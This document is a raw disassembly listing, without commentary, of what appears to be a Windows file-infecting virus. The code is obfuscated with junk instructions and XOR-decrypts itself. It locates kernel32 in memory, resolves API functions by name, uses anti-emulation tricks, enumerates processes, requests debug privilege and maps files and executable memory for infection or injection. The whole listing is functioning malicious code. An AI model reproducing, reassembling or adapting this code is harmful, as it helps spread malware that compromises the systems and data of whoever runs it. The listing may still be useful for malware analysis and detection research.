dword_47C039 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_4909E4+2F�r
align 10h
dd 4C000000h, 4C64616Fh, 61726269h, 417972h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 2 dup(0)
dd 47C07900h, 47C07D00h, 5 dup(0)
db 0
byte_47C085 db 90h ; DATA XREF: start+47�o
word_47C086 dw 25E8h ; DATA XREF: fuck:0047C1A4�o
; start:loc_47C826�o
dd 1, 10h, 1F0h, 2A0h, 6 dup(0)
dd 0C4000000h, 560001D8h, 0A3h, 38h, 1Ah dup(0)
dd 56000000h, 75747269h, 6C416C61h, 636F6Ch, 61427349h
dd 61655264h, 72745064h, 809A5100h, 809E017Ch, 8000007Ch
dd 7Ch, 0
dd 40000000h, 0
dd 2890000h, 80000000h, 1492A7Ch, 0
dd 72695600h, 6C617574h, 746F7250h, 746365h, 7C801AD0h
dd 4, 1, 2 dup(0)
dd 12FFC0h, 0FFFFA2D5h, 0FFFFFFFEh, 0
dd offset word_47C086
dd offset start
dd 0FFFFFFFFh, 0E8h, 0ED815D00h, 4011B5h, 11988589h, 9D890040h
dd 40119Ch, 11A08D89h, 95890040h, 4011A4h, 11A8B589h, 0BD890040h
dd 4011ACh, 1188BD83h, 74000040h, 94A58B2Bh, 8B004011h
dd 40119885h, 9C9D8B00h, 8B004011h, 4011A08Dh, 0A4958B00h
dd 8B004011h, 4011A8B5h, 0ACBD8B00h, 0C3004011h, 1194A589h
dd 85830040h, 401194h, 8885C704h, 1004011h, 8D000000h
dd 40102885h, 95FF5000h, 401035h, 114D8589h, 9D8D0040h
dd 40112Bh, 95FF5053h, 401039h, 11458589h, 9D8D0040h, 401138h
dd 4DB5FF53h, 0FF004011h, 40103995h, 49858900h, 8D004011h
dd 4011719Dh, 0B5FF5300h, 40114Dh, 103995FFh, 85890040h
dd 401180h, 0E8h, 81665A00h, 745A4D3Ah, 0F6EB4A03h, 3C4AB70Fh
dd 5152CA03h, 0FF51046Ah, 40114995h, 0B5A5900h, 810875C0h
dd 455039h, 4A037400h, 7981D4EBh, 3DC70h, 4A037400h, 9589C8EBh
dd 401159h, 84858D51h, 50004011h, 68046Ah, 51000010h, 118095FFh
dd 8B590040h, 40118C85h, 78418900h, 1190858Bh, 41890040h
dd 0AB9517Ch, 33000000h, 0DBB58DD2h, 3004010h, 0C085ADF2h
dd 85031774h, 401159h, 9D8D60h, 53004010h, 6158D0FFh, 0E204C283h
dd 8D5159DCh, 40118485h, 46A5000h, 100068h, 95FF5100h
dd 401180h, 6D858B59h, 89004011h, 8881h, 8C81C700h, 68000000h
dd 6A000003h, 10006840h, 680000h, 6A010000h, 4595FF00h
dd 8B004011h, 0C381D8h, 8D002000h, 40108BB5h, 0B3BD8D00h
dd 33004010h, 0AB9D2h, 85AD0000h, 32974C0h, 40115985h
dd 50535000h, 1B8E8h, 8C48300h, 8D8D6058h, 4010B3h, 98BCA03h
dd 0F38BF88Bh, 8361A4F3h, 0D2E204C2h, 1151BD83h, 74000040h
dd 51858B66h, 8B004011h, 4011599Dh, 0FF38B00h, 33C7EB7h
dd 34578BFEh, 89DA2B60h, 4011559Dh, 0D33B6100h, 0D8034174h
dd 74003B83h, 8B038B3Ah, 0E9D1044Bh, 0F08C383h, 0D78B3BB7h
dd 830CEFC1h, 1A7503FFh, 0E781FA8Bh, 0FFFh, 0BD03F803h
dd 401159h, 55858B50h, 1004011h, 0FA8B5807h, 0E202C383h
dd 8BC1EBD2h, 40115D85h, 74C00B00h, 59850311h, 8B004011h
dd 401079BDh, 8708B00h, 0B58B3E89h, 401161h, 1159B503h
dd 0EE830040h, 14C68314h, 107E83h, 90840Fh, 5E8B0000h
dd 599D030Ch, 56004011h, 3595FF53h, 5E004010h, 11658589h
dd 3E830040h, 8B137400h, 59BD033Eh, 8B004011h, 8D03104Eh
dd 401159h, 7E8B12EBh, 59BD0310h, 8B004011h, 8D03104Eh
dd 401159h, 74003F83h, 0F1F8BACh, 721FE3BAh, 599D0320h
dd 83004011h, 575102C3h, 65B5FF53h, 0FF004011h, 40103995h
dd 89595F00h, 0EB018907h, 0D1E3D119h, 535751EBh, 1165B5FFh
dd 95FF0040h, 401039h, 789595Fh, 0C7830189h, 4C18304h
dd 0AB9B2EBh, 33000000h, 3B58DD2h, 3004011h, 0C085ADF2h
dd 85031774h, 401159h, 9D8D60h, 53004010h, 6158D0FFh, 0E204C283h
dd 94A58BDCh, 8B004011h, 40119885h, 9C9D8B00h, 8B004011h
dd 4011A08Dh, 0A4958B00h, 8B004011h, 4011A8B5h, 0ACBD8B00h
dd 8B004011h, 40116995h, 59950300h, 0FF004011h, 40C033E2h
dd 748B60C3h, 7C8B2424h, 0B2FC2824h, 0A4DB3380h, 6DE802B3h
dd 73000000h, 0E8C933F6h, 64h, 0C0331C73h, 5BE8h, 0B3237300h
dd 10B04102h, 4FE8h, 73C01200h, 0AA3F75F7h, 4DE8D4EBh
dd 2B000000h, 0E81075CBh, 42h, 0D1AC28EBh, 134D74E8h, 911CEBC9h
dd 8E0C148h, 2CE8ACh, 3D0000h, 7300007Dh, 5FC800Ah, 0F8830673h
dd 4102777Fh, 0C58B9541h, 8B5601B3h, 0F3F02BF7h, 8EEB5EA4h
dd 575D202h, 1246168Ah, 0C933C3D2h, 0FFEEE841h, 0C913FFFFh
dd 0FFFFE7E8h, 0C3F272FFh, 28247C2Bh, 1C247C89h, 9090C361h
dd 90909090h
; =============== S U B R O U T I N E =======================================
public start
start proc near ; DATA XREF: fuck:0047C1A8�o
mov ecx, 56Fh
and ebx, ebx
inc ebx
inc eax
dec ebx
or bl, ah
and ebx, ebx
add eax, 4FACh
or ebp, ebx
inc ebp
and al, 43h
xor ah, ah
sbb ebx, ebp
inc edi
sub eax, 45Eh
cmp ebp, ebp
jg loc_47C623
add eax, 23B2h
loc_47C623: ; CODE XREF: start+24�j
sub ah, bl
dec ebx
xor al, 84h
inc ebx
and al, 97h
dec edi
or ebx, ebp
push ebx
dec eax
pop eax
dec edi
dec edi
sbb eax, 4CCCh
inc eax
and ebp, ebp
mov esi, offset byte_47C085
and ebx, ebx
inc ebx
inc eax
dec ebx
or bl, ah
and ebx, ebx
add eax, 4FACh
or ebp, ebx
inc ebp
and al, 43h
xor ah, ah
sbb ebx, ebp
inc edi
sub eax, 45Eh
cmp ebp, ebp
jg loc_47C66A
add eax, 23B2h
loc_47C66A: ; CODE XREF: start+6B�j
sub ah, bl
dec ebx
xor al, 84h
inc ebx
and al, 97h
dec edi
or ebx, ebp
push ebx
dec eax
pop eax
dec edi
dec edi
sbb eax, 4CCCh
inc eax
and ebp, ebp
call $+5
pop edx
add edx, 4
and ebx, ebx
inc ebx
inc eax
dec ebx
or bl, ah
and ebx, ebx
add eax, 4FACh
or ebp, ebx
inc ebp
and al, 43h
xor ah, ah
sbb ebx, ebp
inc edi
sub eax, 45Eh
cmp ebp, ebp
jg loc_47C6B5 ; DATA XREF: sub_4889E5+6�w
; sub_4909E4+6�w
add eax, 23B2h
loc_47C6B5: ; CODE XREF: start+B6�j
sub ah, bl
dec ebx
xor al, 84h
inc ebx
and al, 97h
dec edi
or ebx, ebp
push ebx
dec eax
pop eax
dec edi
dec edi
sbb eax, 4CCCh
inc eax
and ebp, ebp
test ecx, ecx
jz loc_47C826
and ebx, ebx
inc ebx
inc eax
dec ebx
or bl, ah
and ebx, ebx
add eax, 4FACh
or ebp, ebx
inc ebp
and al, 43h
xor ah, ah
sbb ebx, ebp
inc edi
sub eax, 45Eh
cmp ebp, ebp
jg loc_47C6FF
add eax, 23B2h
loc_47C6FF: ; CODE XREF: start+100�j
sub ah, bl
dec ebx
xor al, 84h
inc ebx
and al, 97h
dec edi
or ebx, ebp
push ebx
dec eax
pop eax
dec edi
dec edi
sbb eax, 4CCCh
inc eax
and ebp, ebp
xor byte ptr [esi], 77h
and ebx, ebx
inc ebx
inc eax
dec ebx
or bl, ah
and ebx, ebx
add eax, 4FACh
or ebp, ebx
inc ebp
and al, 43h
xor ah, ah
sbb ebx, ebp
inc edi
sub eax, 45Eh
cmp ebp, ebp
jg loc_47C744
add eax, 23B2h
loc_47C744: ; CODE XREF: start+145�j
sub ah, bl
dec ebx
xor al, 84h
inc ebx
and al, 97h
dec edi
or ebx, ebp
push ebx
dec eax
pop eax
dec edi
dec edi
sbb eax, 4CCCh
inc eax
and ebp, ebp
inc esi
and ebx, ebx
inc ebx
inc eax
dec ebx
or bl, ah
and ebx, ebx
add eax, 4FACh
or ebp, ebx
inc ebp
and al, 43h
xor ah, ah
sbb ebx, ebp
inc edi
sub eax, 45Eh
cmp ebp, ebp
jg loc_47C787
add eax, 23B2h
loc_47C787: ; CODE XREF: start+188�j
sub ah, bl
dec ebx
xor al, 84h
inc ebx
and al, 97h
dec edi
or ebx, ebp
push ebx
dec eax
pop eax
dec edi
dec edi
sbb eax, 4CCCh
inc eax
and ebp, ebp
dec ecx
and ebx, ebx
inc ebx
inc eax
dec ebx
or bl, ah
and ebx, ebx
add eax, 4FACh
or ebp, ebx
inc ebp
and al, 43h
xor ah, ah
sbb ebx, ebp
inc edi
sub eax, 45Eh
cmp ebp, ebp
jg loc_47C7CA
add eax, 23B2h
loc_47C7CA: ; CODE XREF: start+1CB�j
sub ah, bl
dec ebx
xor al, 84h
inc ebx
and al, 97h
dec edi
or ebx, ebp
push ebx
dec eax
pop eax
dec edi
dec edi
sbb eax, 4CCCh
inc eax
and ebp, ebp
jmp edx
; ---------------------------------------------------------------------------
and ebx, ebx
inc ebx
inc eax
dec ebx
or bl, ah
and ebx, ebx
add eax, 4FACh
or ebp, ebx
inc ebp
and al, 43h
xor ah, ah
sbb ebx, ebp
inc edi
sub eax, 45Eh
cmp ebp, ebp
jg loc_47C80E
add eax, 23B2h
loc_47C80E: ; CODE XREF: start+20F�j
sub ah, bl
dec ebx
xor al, 84h
inc ebx
and al, 97h
dec edi
or ebx, ebp
push ebx
dec eax
pop eax
dec edi
dec edi
sbb eax, 4CCCh
inc eax
and ebp, ebp
loc_47C826: ; CODE XREF: start+DB�j
mov edx, offset word_47C086
and esi, ebx
and ah, bl
cmp ebx, ebx
jz loc_47C84F
inc ebx
inc eax
adc bl, ah
and ebx, ebx
inc ebp
add eax, 4FACh
or ebp, ebx
or eax, 2695h
dec ebx
push edi
pop ebp
sbb ebx, ebp
loc_47C84F: ; CODE XREF: start+23D�j
inc edi
sub eax, 45Eh
cmp ebp, ebp
jbe loc_47C86E
add ah, ah
sub ah, bl
dec eax
dec ebx
xor al, 84h
inc ebx
and al, 97h
push ebp
dec eax
or ebx, ebp
pop edi
inc ebp
loc_47C86E: ; CODE XREF: start+263�j
dec eax
dec edi
dec edi
dec edi
push ebx
and ebp, ebp
xor ah, bl
pop edi
adc ah, ah
push ebp
dec ebx
dec ebp
or ebp, ebp
or bl, bl
jmp edx
start endp
; ---------------------------------------------------------------------------
db 21h
dd 4B4043DBh, 0DB21DC0Ah, 4FAC0558h, 0DD090000h, 32432445h
dd 47DD1BE4h, 45E2Dh, 0FED3B00h, 58Fh, 23B20500h, 0E32A0000h
dd 4384344Bh, 0B4F9724h, 584853DDh, 0CC1D4F4Fh, 4000004Ch
dd 0ED23h, 5CEh dup(0)
; ---------------------------------------------------------------------------
loc_47E000: ; DATA XREF: fuck:00481308�o
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_47E04D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_47E041
mov ebx, [eax+29C1h]
jmp short loc_47E04B
; ---------------------------------------------------------------------------
loc_47E041: ; CODE XREF: fuck:0047E037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_47E04B: ; CODE XREF: fuck:0047E03F�j
mov ebx, [ebx]
loc_47E04D: ; CODE XREF: fuck:0047E01F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1A11h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0E8h
rep movsb
sldt cx
test ecx, ecx
jnz short loc_47E07B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_47E07B: ; CODE XREF: fuck:0047E074�j
and ebx, 0FFFFF000h
loc_47E081: ; CODE XREF: fuck:0047E090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_47E092
loc_47E08A: ; CODE XREF: fuck:0047E09F�j
sub ebx, 100h
jnz short loc_47E081
loc_47E092: ; CODE XREF: fuck:0047E088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_47E08A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_47E0AC: ; CODE XREF: fuck:loc_47E0C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_47E0C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_47E0C5
loc_47E0C0: ; CODE XREF: fuck:0047E0B5�j
loop loc_47E0AC
pop ecx
jmp short loc_47E0F0
; ---------------------------------------------------------------------------
loc_47E0C5: ; CODE XREF: fuck:0047E0BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_47E137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_47E17E
loc_47E0F0: ; CODE XREF: fuck:0047E0C3�j
; sub_47E17E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_47E11C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_47E11C: ; CODE XREF: sub_47E17E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_47E17E
; ---------------------------------------------------------------------------
dw 0FBE0h
; =============== S U B R O U T I N E =======================================
sub_47E120 proc near ; CODE XREF: sub_48045B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_47E128: ; CODE XREF: sub_47E120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_47E128
pop ebx
retn
sub_47E120 endp
; ---------------------------------------------------------------------------
loc_47E137: ; CODE XREF: fuck:0047E0EE�j
call near ptr loc_47E146+2
inc ebx
insb
outsd
jnb short near ptr loc_47E1A3+3
dec eax
popa
outsb
db 64h
insb
loc_47E146: ; CODE XREF: fuck:loc_47E137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_47E162+1
inc ebx
jb short loc_47E1BE
popa
jz short near ptr loc_47E1C0+1
inc ebp
jbe short near ptr loc_47E1C0+4
outsb
jz short loc_47E1A3
loc_47E162: ; CODE XREF: fuck:0047E151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_47E17E
inc edi
db 65h
jz short near ptr loc_47E1C0+1
popa
jnb short near ptr loc_47E1EA+2
inc ebp
jb short near ptr loc_47E1EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_47E17E proc near ; CODE XREF: fuck:0047E16C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0047E0F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 0047E534 SIZE 0000000B BYTES
push ebx
call esi
mov [ebp+103E6Ah], eax
call sub_47E55F
test eax, eax
jz loc_47E0F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_47E534
loc_47E1A3: ; CODE XREF: fuck:0047E160�j
; fuck:0047E13F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_47E1C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_47E1BE: ; CODE XREF: fuck:0047E157�j
jmp short loc_47E1C7
; ---------------------------------------------------------------------------
loc_47E1C0: ; CODE XREF: sub_47E17E+2C�j
; fuck:0047E15A�j ...
and dword ptr [ebp+101598h], 0
loc_47E1C7: ; CODE XREF: sub_47E17E:loc_47E1BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_47E1EA: ; CODE XREF: fuck:0047E176�j
; fuck:0047E179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_47E59C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_47E2E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_47E534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_47E534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_47E534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_47E2D3
jmp loc_47E534
; ---------------------------------------------------------------------------
loc_47E2D3: ; CODE XREF: sub_47E17E+14B�p
; sub_47E17E+162�j
push 0
pop ecx
jecxz short locret_47E2E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_47E2D3
; ---------------------------------------------------------------------------
locret_47E2E2: ; CODE XREF: sub_47E17E+158�j
retn
; ---------------------------------------------------------------------------
loc_47E2E3: ; CODE XREF: sub_47E17E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_47E534
call near ptr loc_47E2FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_47E2FA: ; CODE XREF: sub_47E17E+172�p
add bh, bh
sub_47E17E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_47E59C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_47E534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_47E534
mov ecx, [ebp+103F06h]
jecxz short loc_47E383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_47E383
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_47E383: ; CODE XREF: fuck:0047E367�j
; fuck:0047E378�j
call sub_47E540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_47E3CC: ; CODE XREF: fuck:0047E3D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_47E3CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_47E534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_47E17E
loc_47E534: ; CODE XREF: sub_47E17E+1F�j
; sub_47E17E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_47E0F0
; END OF FUNCTION CHUNK FOR sub_47E17E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_47E540 proc near ; CODE XREF: fuck:loc_47E383�p
; sub_47E55F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_47E540 endp
; ---------------------------------------------------------------------------
aVx_4 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_47E55F proc near ; CODE XREF: sub_47E17E+9�p
xor ecx, ecx
call sub_47E540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_47E55F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 1, 2 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_47E59C proc near ; CODE XREF: sub_47E17E+7C�p
; fuck:0047E312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_47E5A7: ; CODE XREF: sub_47E59C+E�j
lodsb
test al, al
jnz short loc_47E5A7
loop sub_47E59C
retn
sub_47E59C endp
; =============== S U B R O U T I N E =======================================
sub_47E5AF proc near ; CODE XREF: sub_48012D+25�p
; FUNCTION CHUNK AT 0047E639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 0047EA09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_47E5DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_47E639
jbe short near ptr loc_47E639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_47E640
inc ecx
loc_47E5DC: ; CODE XREF: sub_47E5AF+13�p
add [eax-1], dl
sub_47E5AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_47E5AF
loc_47E639: ; CODE XREF: sub_47E5AF+1F�j
; sub_47E5AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_47E6A3+2
loc_47E640: ; CODE XREF: sub_47E5AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_47E6AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_47E6B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_47E6C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_47E6E1+1
push 4500746Fh
js short loc_47E6DF
jz short near ptr loc_47E6CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_47E700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_47E6E3+6
loc_47E6A3: ; CODE XREF: sub_47E5AF+8F�j
imul ebp, [ebp+41h], 69727474h
loc_47E6AB: ; CODE XREF: sub_47E5AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_47E6F2
add [edi+65h], al
jz short near ptr loc_47E6FB+1
loc_47E6B6: ; CODE XREF: sub_47E5AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_47E708
loc_47E6C2: ; CODE XREF: sub_47E5AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_47E6CB: ; CODE XREF: sub_47E5AF+C7�j
db 65h
jz short near ptr loc_47E71A+1
outsd
db 64h
jnz short near ptr loc_47E739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_47E72D+6
loc_47E6DF: ; CODE XREF: sub_47E5AF+C5�j
db 65h
insd
loc_47E6E1: ; CODE XREF: sub_47E5AF+BE�j
jo short near ptr loc_47E727+2
loc_47E6E3: ; CODE XREF: sub_47E5AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_47E741+3
db 65h
insd
loc_47E6F2: ; CODE XREF: sub_47E5AF+FF�j
jo short near ptr loc_47E741+3
popa
jz short near ptr loc_47E75E+1
inc ecx
add [edi+65h], al
loc_47E6FB: ; CODE XREF: sub_47E5AF+105�j
jz short loc_47E753
db 65h
jb short near ptr loc_47E772+1
loc_47E700: ; CODE XREF: sub_47E5AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_47E708: ; CODE XREF: sub_47E5AF+110�j
db 65h
jb short near ptr loc_47E77C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_47E76B+1
outsd
insb
jnz short near ptr loc_47E781+6
loc_47E71A: ; CODE XREF: sub_47E5AF:loc_47E6CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_47E78C+2
popa
jz short near ptr loc_47E78C+1
outsd
outsb
inc ecx
loc_47E727: ; CODE XREF: sub_47E5AF:loc_47E6E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_47E72D: ; CODE XREF: sub_47E5AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_47E78F
loc_47E739: ; CODE XREF: sub_47E5AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_47E741: ; CODE XREF: sub_47E5AF+13F�j
; sub_47E5AF:loc_47E6F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_47E753: ; CODE XREF: sub_47E5AF:loc_47E6FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_47E7C9+1
arpl [ebp+73h], sp
loc_47E75E: ; CODE XREF: sub_47E5AF+146�j
jnb short $+2
push eax
jb short loc_47E7D2
arpl [ebp+73h], sp
jnb short near ptr loc_47E794+7
xor al, [esi+69h]
loc_47E76B: ; CODE XREF: sub_47E5AF+164�j
jb short near ptr loc_47E7DA+6
jz short $+2
push eax
jb short near ptr loc_47E7DA+7
loc_47E772: ; CODE XREF: sub_47E5AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_47E7A9+1
xor cl, [esi+65h]
js short near ptr loc_47E7EC+4
loc_47E77C: ; CODE XREF: sub_47E5AF:loc_47E708�j
